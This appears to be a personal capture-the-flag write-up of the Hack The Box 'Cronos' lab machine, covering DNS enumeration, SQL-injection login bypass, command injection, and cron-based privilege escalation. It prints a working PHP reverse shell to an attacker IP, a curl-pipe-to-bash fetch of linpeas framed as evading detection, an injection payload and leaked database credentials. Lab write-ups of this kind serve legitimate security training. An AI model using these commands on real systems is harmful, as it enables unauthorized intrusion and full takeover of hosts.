• Donald Ashdown

HTB Cronos

Summary

This was a great machine that did not provide anything too challenging or obscure which I really appreciated. It did however test many techniques from DNS enumeration, to sqli, command injection, and priv esc. The DNS enumeration provided us with new targets that were vulnerable to SQL injection login by passing, from which command injection provided a user shell. From here I escalated to root with a kernal exploit found with "uname -a", as well as a second path of replacing the "artisan" file being continually executed by root.

Tools used
  • Linepeas

Processes/techniques
  • DNS enumeration with dig

  • Command injection with a reverseshell

  • Execute linpeas from memory "curl -s http://"ip":port/linpeas.sh | bash

  • Replace file being execute by cron job with a shell


Recon

Fairly straight forward with a DNS and a webserver.


Enumeration: DNS

I tried using several DNS enumeration tools without any luck. Generally in HTB you update your /etc/hosts file with the individual box name as the nameserver. So for good practice I eventually added cronos.htb to my /etc/hosts file and re-ran dns enumeration with many result.

We add all these servers to our /etc/hosts file.

10.129.30.241 admin.cronos.htb ns1.cronos.htb www.cronos.htb cronos.htb

There was little on the main page but the admin page was accepting credentials.

A little sql injection for the win!

Login with ' OR 1 -- -

With command injection we can use ;command

Reverse shell

I tried bash, netcat and finally php worked. The traceroute command was appended with a revershell. 8.8.8.8;code here.

php -r '$sock=fsockopen("10.10.14.120",6363);exec("/bin/sh -i <&3 >&3 2>&3");'


We find creds in the landing folder for a DB

admin

kEjdbRigfBHUREiNSDs


This lead me to nowhere so we proceeded to enumeration.


Privilege escalation

From here we use the usual linpeas to enumerate the target system. In order to remain under the radar we will execute linpeas from memory instead of from the HDD.


Curl -s http://10.10.14.120:8000/linpeas.sh | bash

I noticed this while scrolling through linpeas and it looks promising according the linpeas as per the "highlighted in yellow" and the fact that root is running something from a user folder on a schedule.


I attempted to edit the artisan file and after some time I had no luck. So I eventually deleted it, and copied a php reverseshell in its location and name and this game me root access.


There was also a kernal exploit that could of been identified with uname -a


32 views0 comments